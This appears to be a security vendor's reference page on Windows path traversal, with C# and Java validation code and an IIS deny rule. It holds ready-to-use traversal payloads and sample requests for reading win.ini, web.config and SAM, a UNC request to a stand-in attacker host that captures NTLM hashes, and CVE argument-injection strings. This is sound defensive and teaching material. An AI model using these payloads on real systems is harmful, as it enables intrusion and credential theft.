Uses Windows-specific traversal sequences (..\ or ../) and alternate encodings to traverse directories on Windows server filesystems.
TL;DR
/ and \ — double the encoding surface vs. Linux\\attacker\share trigger NTLM hash leak from the server process..;/ path parameter bypass (CVE-2025-55752) evades WAF rules checking for ../getCanonicalPath() in Java, Path.resolve() in .NET — not backslash normalizationWindows path traversal (CWE-22) exploits Windows-specific filesystem semantics that create a wider attack surface than Linux path traversal. Windows accepts both forward slash / and backslash \ as directory separators. Win32 APIs normalize path separators, expand environment variables, handle 8.3 short filename aliases, and process UNC paths — each of these creates a bypass vector that does not exist on Unix systems.
Under OWASP A01:2021, Windows path traversal most commonly targets IIS web servers, ASP.NET applications, and PHP-CGI configurations on Windows. The vulnerability class gained renewed attention in 2024 with CVE-2024-4577 (PHP-CGI Windows argument injection, CVSS 9.8, exploited by TellYouThePass ransomware within 48 hours) and the Apache Tomcat TOCTOU chain (CVE-2024-50379, CVSS 9.8) on case-insensitive NTFS filesystems.
The primary distinction from Linux traversal is the encoding surface: a Linux-centric filter that blocks / traversal may pass \ traversal, and vice versa. A thorough Windows traversal test must cover both separators, their encoded forms, and Windows-specific path constructs including UNC paths, Alternate Data Streams, 8.3 filename aliases, and Tomcat path parameter syntax.
Windows resolves .. segments regardless of whether they use / or \:
GET /download?file=..\..\..\..\Windows\win.ini HTTP/1.1
Host: iis-server.example.com
HTTP/1.1 200 OK
Content-Type: application/octet-stream
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1GET /download?file=..%5c..%5c..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: iis-server.example.com
HTTP/1.1 200 OK
; for 16-bit app support
[fonts]The %5c encoding for backslash evades filters checking for literal \ but passes filters designed for Linux that only check for %2f or /.
Literal backslash: ..\..\..\..\Windows\win.ini
Encoded backslash: ..%5c..%5c..%5cWindows%5cwin.ini
Mixed separators: ../\../\..\Windows/win.ini
Double-encoded: ..%255c..%255c..%255cWindows%255cwin.ini
Mixed slash-backslash: ..%2f..%5c..%2f..%5cWindows%5cwin.ini
Tomcat path params: ..;/..;/..;/..;/Windows/win.iniWindows UNC paths trigger outbound network connections from the server:
GET /download?file=\\attacker.com\share\file.txt HTTP/1.1
Host: windows-server.example.comThe Windows server initiates an SMB connection to attacker.com to resolve the UNC path. This SMB authentication attempt includes the server's NTLM hash — capturable with Responder or Impacket's ntlmrelayx. The server's machine account hash can then be relayed to other internal systems for lateral movement.
NTFS supports named streams on files, allowing multiple data forks under one filename:
GET /files/report.pdf::$DATA HTTP/1.1
GET /config/web.config::$DATA HTTP/1.1The ::$DATA suffix reads the default data stream. Some IIS configurations and older ASP applications failed to strip this stream specifier, allowing attackers to read source code of ASP/ASPX files by appending ::$DATA — the response returns the raw source rather than executing the file.
GET /login.asp::$DATA HTTP/1.1
Host: legacy-iis.example.com
HTTP/1.1 200 OK
Content-Type: text/html
<%
Dim strConn
strConn = "Provider=SQLOLEDB;Data Source=db-server;..." & _
"User ID=webapp;Password=S3cr3tDB!"
%>| Variant | Payload | Target | Impact |
|---|---|---|---|
| Backslash traversal | ..\..\Windows\win.ini | Any Windows app | Filesystem access confirmation |
| Encoded backslash | ..%5c..%5cWindows%5cwin.ini | Linux-only filter bypass | Same as above, evades / filter |
| web.config read | ..\..\inetpub\wwwroot\web.config | IIS/ASP.NET | DB connection strings, app secrets |
| SAM backup | ..\..\Windows\repair\SAM | Admin-accessible servers | NT password hashes |
| UNC injection | \\attacker\share\trigger | Windows SMB stack | NTLM hash capture, relay |
| ADS bypass | file.asp::$DATA | Legacy IIS | ASP source code disclosure |
| 8.3 alias | PROGRA~1\secret.txt | Long-path filters | Short name alias bypass |
Tomcat ..;/ | ..;/..;/WEB-INF/web.xml | Tomcat path parameter | WAF bypass, web.xml read |
| File | Confirmation Marker | Impact |
|---|---|---|
C:\Windows\win.ini | [fonts], [extensions] | Filesystem access confirmation |
C:\inetpub\wwwroot\web.config | <connectionStrings>, <appSettings> | DB credentials, API keys, auth secrets |
C:\Windows\System32\drivers\etc\hosts | 127.0.0.1 localhost | Internal hostname enumeration |
C:\Windows\repair\SAM | Binary (NT hash format) | Offline NT hash cracking |
C:\inetpub\logs\LogFiles\W3SVC1\*.log | IIS log format | Log poisoning for ASP/ASP.NET RCE |
C:\Program Files\app\config.xml | Application-specific | App-specific credential files |
CVE-2024-4577 — PHP-CGI Windows Best-Fit Argument Injection (CVSS 9.8): Discovered by Devcore in June 2024. Windows uses "Best-Fit" character mapping when converting between code pages: the Soft Hyphen character (Unicode 0xAD) maps to Hyphen-Minus (0x2D, the - character) under the cp932 (Japanese) encoding. Apache HTTP Server escapes 0x2D in CGI arguments but does not escape 0xAD. PHP-CGI applies Windows Best-Fit encoding normalization, converting 0xAD to 0x2D and interpreting it as a PHP-CGI command-line argument delimiter. Attackers send a request containing 0xAD-encoded "hyphens" to inject arbitrary PHP-CGI arguments: -d allow_url_include=1 -d auto_prepend_file=php://input. This achieves unauthenticated RCE without any file traversal. TellYouThePass ransomware, Gh0st RAT, and RedTail cryptominers weaponized the vulnerability within 48 hours of disclosure. CISA added it to the KEV catalog. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
CVE-2024-50379 — Apache Tomcat TOCTOU on Windows (CVSS 9.8): Tomcat's default servlet, when write operations are enabled, performs a time-of-check time-of-use race condition during JSP compilation on case-insensitive filesystems (Windows NTFS). An attacker sends concurrent partial PUT requests that manipulate the path resolution timing window to overwrite JSP files in the web application root. The overwritten JSP contains attacker-controlled code executed by Tomcat when the next request hits the file. An incomplete mitigation CVE-2024-56337 was disclosed one week later — the fix required explicit JVM system property configuration not documented in the initial advisory.
CVE-2024-38472 — Apache HTTP Server UNC Path Coercion (Windows): Part of Orange Tsai's "Confusion Attacks" cluster presented at DEF CON 32. Apache's apr_filepath_merge() function on Windows failed to reject UNC path prefixes in URI components. An attacker sent %5C%5Cattacker-server/path in a request URI, causing Apache to initiate an outbound SMB connection to attacker-server — leaking the server's NTLM credentials and enabling relay attacks. CVSS 7.5.
..\..\..\..\Windows\win.ini. Confirm with [fonts] in the response...%5c..%5c..%5cWindows%5cwin.ini.../\../\..\Windows/win.ini.web.config access: ..\..\inetpub\wwwroot\web.config — confirm with <connectionStrings> or <appSettings>...;/..;/..;/WEB-INF/web.xml.::$DATA to .asp, .aspx, or .config file paths.\\attacker-controlled-host\test in the path parameter triggers an outbound SMB connection (use Responder in listener mode).BreachVex includes Windows-specific payload variants: ..%5c..%5c..%5c (encoded backslash), ..\..\..\..\Windows\win.ini (literal backslash), and ..;/..;/..;/..;/..;/..;/..;/ (Tomcat path parameter bypass, CVE-2025-55752). Windows file markers ([fonts] for win.ini, <connectionStrings> for web.config) are in the content gate. UNC path injection testing requires network capture setup outside the standard scan flow.
// C# / ASP.NET — Path.GetFullPath normalizes both / and \ and resolves ..
using System.IO;
private static readonly string BASE_DIR =
Path.GetFullPath(@"C:\inetpub\wwwroot\uploads\");
public byte[] SafeReadFile(string userInput)
{
// GetFullPath resolves both / and \ separators and .. sequences
string resolved = Path.GetFullPath(Path.Combine(BASE_DIR, userInput));
// String comparison is case-insensitive on Windows
if (!resolved.StartsWith(BASE_DIR, StringComparison.OrdinalIgnoreCase))
{
throw new UnauthorizedAccessException("Path traversal blocked");
}
return File.ReadAllBytes(resolved);
}// Java on Windows — getCanonicalFile handles both separators
import java.io.*;
import java.nio.file.*;
public byte[] safeDownload(String userInput) throws IOException {
File base = new File("C:\\inetpub\\wwwroot\\uploads\\").getCanonicalFile();
File requested = new File(base, userInput).getCanonicalFile();
// toPath().startsWith() performs path-component-aware comparison
if (!requested.toPath().startsWith(base.toPath())) {
throw new SecurityException("Path traversal attempt blocked");
}
return Files.readAllBytes(requested.toPath());
}On Windows, path comparison must be case-insensitive. A filter that rejects C:\Windows\win.ini but passes c:\windows\win.ini is bypassed by case variation. Use StringComparison.OrdinalIgnoreCase in .NET and equalsIgnoreCase in Java path comparisons. Path.GetFullPath in .NET and getCanonicalFile in Java both normalize case for you.
// Explicitly reject UNC paths and Windows drive letters in user input
private static void ValidateInputNotUNC(string userInput)
{
if (userInput.StartsWith(@"\\") || userInput.StartsWith(@"//"))
throw new ArgumentException("UNC paths are not permitted");
// Reject drive letters (C:, D:, etc.)
if (userInput.Length >= 2 && userInput[1] == ':')
throw new ArgumentException("Drive letter paths are not permitted");
}In IIS configuration, set allowDoubleEscaping="false" (default in IIS 7+) and configure request filtering to reject paths containing :::
<!-- web.config — IIS request filtering -->
<system.webServer>
<security>
<requestFiltering allowDoubleEscaping="false">
<denyStrings>
<add string="::" />
<add string="%3a%3a" />
</denyStrings>
</requestFiltering>
</security>
</system.webServer>The Tomcat ..;/ path parameter bypass (CVE-2025-55752) is blocked by upgrading to the patched Tomcat version and enabling strict path validation. WAF rules that only check for ../ miss this variant. If you cannot patch immediately, configure Tomcat's allowBackslash="false" and rejectIllegalHeader="true" in server.xml as a partial mitigation.
Windows accepts both / and \ as path separators, creating twice the encoding surface. Windows also supports UNC paths (\\server\share), Alternate Data Streams (file.txt::$DATA), 8.3 short filename aliases (PROGRA~1 for Program Files), and reserved device names (CON, NUL, PRN). Each of these creates bypass vectors that do not exist on Linux systems.
C:\Windows\win.ini confirms filesystem access (marker: [fonts]). C:\inetpub\wwwroot\web.config exposes ASP.NET connection strings and application secrets. C:\Windows\System32\drivers\etc\hosts reveals internal DNS mappings. C:\Windows\repair\SAM (and the VSS shadow copy equivalent) contains backup NT password hashes. IIS log files in C:\inetpub\logs\LogFiles\W3SVC1\ can be used for log poisoning on Windows if ASP/ASP.NET execution is available.
CVE-2024-4577 (CVSS 9.8, PHP-CGI on Windows) exploits Windows Best-Fit character encoding. The Soft Hyphen character (0xAD) is mapped to Hyphen/Minus (0x2D) by the Windows encoding subsystem. Apache escapes 0x2D but not 0xAD. PHP-CGI applies Best-Fit mapping, converting 0xAD to 0x2D and treating it as a CLI argument delimiter (-). This allows injection of PHP-CGI arguments like -d allow_url_include=1 -d auto_prepend_file=php://input, achieving RCE. It is classified as a path/argument injection via Windows encoding normalization.
CVE-2024-50379 (CVSS 9.8) is a TOCTOU (Time-of-Check Time-of-Use) race condition in Apache Tomcat on Windows with case-insensitive filesystems. During JSP compilation, Tomcat checks the path at one moment and uses it at another. An attacker uses partial PUT uploads to manipulate the path resolution window, overwriting JSP files with malicious content that executes as RCE when the JSP is served. The incomplete fix CVE-2024-56337 required explicit JVM system property configuration.
The Tomcat path parameter bypass CVE-2025-55752 uses semicolons as Tomcat-specific path delimiters. The request path /..;/..;/..;/admin/config is parsed by Tomcat as /..;/ = /../ (semicolons introduce path parameters that Tomcat normalizes). This creates a traversal sequence that WAFs and filters checking for ../ may miss because they do not account for Tomcat's path parameter syntax.
Universal Naming Convention (UNC) paths begin with \\server\share and reference files on remote Windows file shares. An application that passes user-supplied paths to Windows filesystem APIs without filtering UNC prefixes may send an NTLM authentication attempt to an attacker-controlled server (\\attacker\share), leaking the server's NTLM hash. This converts a path traversal vulnerability into a credential theft or relay attack.
Windows NTFS supports named data streams on files. Every file has a default stream ($DATA) plus optional named streams. The syntax file.txt::$DATA reads the raw file content. An attacker who can specify ::$DATA appended to a filename may bypass extension-based content type checks — some filters check the extension before ::$DATA and do not account for the stream specifier. This can serve as an extension bypass on IIS-hosted applications.
BreachVex includes Windows-specific payloads in its extended LFI prover: ..%5c..%5c..%5c (backslash encoded), ..\..\..\Windows\win.ini (literal backslash), and mixed slash/backslash sequences. Windows file confirmation uses markers: [fonts] or [extensions] for win.ini, <connectionStrings> for web.config. The Tomcat ..;/ pattern is also in the payload set (CVE-2025-55752).